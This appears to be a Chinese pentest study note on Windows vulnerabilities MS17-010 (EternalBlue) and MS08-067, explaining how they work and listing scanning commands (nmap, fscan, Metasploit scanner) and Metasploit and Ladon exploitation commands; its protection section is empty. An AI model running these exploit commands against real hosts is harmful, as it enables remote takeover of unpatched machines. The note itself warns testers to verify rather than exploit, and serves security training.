操作系统漏洞介绍

操作系统漏洞基础知识

简介

系统漏洞为操作系统本身锁存在的技术缺陷，系统漏洞会被病毒利用侵入并攻击用户计算机

成因及危害

通过植入木马、病毒等方式来攻击或控制整个电脑，从而窃取电脑中的重要资料和信息，甚至破坏系统

常见的操作系统漏洞

MS17_010

简介

永恒之蓝MS17_010，源于wannaCv勒索病毒的诞生，该病毒上不法分子利用NSA（美国安局）泄露的危险漏洞“EternalBlue”进行传播，勒索病毒肆虐，是一场全球性互联网灾难，100多个国家和地区超过10万台电脑遭到勒索病毒攻击、感染

原理及影响

通过TCP445和139端口 利用SMBv1和NBT中远程代码执行流动，通过恶意代码扫描并攻击开放445文件共享端口点windows主机，只要主机开机联网，就可以通过该漏洞控制用户的主机，不法分子就可以在电脑或服务器植入勒索病毒，窃取隐私，远程控制木马等恶意程序

MS08067

简介

MS08-067是 Windows Server服务RPC请求缓冲区溢出漏洞，利用受害者主机默认开放点SMB服务端口445，发送特殊RPC（remote Procedure Call远程过程调用）请求，造成栈缓冲区内存错误，从哪儿被利用实施远程代码执行

原理及影响

MS08-067通过MSRPC over SMB通道调用Server程序中点NEtPathCanonicalize函数时出发点，NetPathCanonicalize函数在远程访问其他主机时，会调用NetpwPathCanonicalize函数，对远程访问的路径进行规范化，而在NetpwPathCanonicalize函数中发生来栈缓冲区内存错误（溢出）造成可被利用实施远程代码执行（Remote Procedure execution）

常见漏洞发现与利用

漏洞发现手段

nmap自带的script功能

命令：

nmap --script=vuln IP_adress

msf漏洞扫描

命令：

use auxiliary/scanner/smb/smb_ms17_010

show options

set RHOSTS IP_adress

fscan

命令：

fscan -h IP_address/submask -m ms17010

其他扫描工具

漏洞利用手段

msf漏洞利用模块

命令：

use exploit/windows/smb/ms17_010_eternalblue

show options

set RHOSTS IP_adress

exploit

其他利用工具

命令：

Ladon IP_adress/submask MS17010

:::color1
测试过程中遵守安全生产要求，漏洞利用操作可能操作操作系统异常（蓝屏、系统崩溃、关机等）验证漏洞时若无特殊要求，只需要验证漏洞存在即可，不进行利用操作

:::

漏洞防护

防护方法

更新: 2025-04-05 19:28:46
原文: https://www.yuque.com/yuhui.net/network/xzrk1ur89u7q4lbb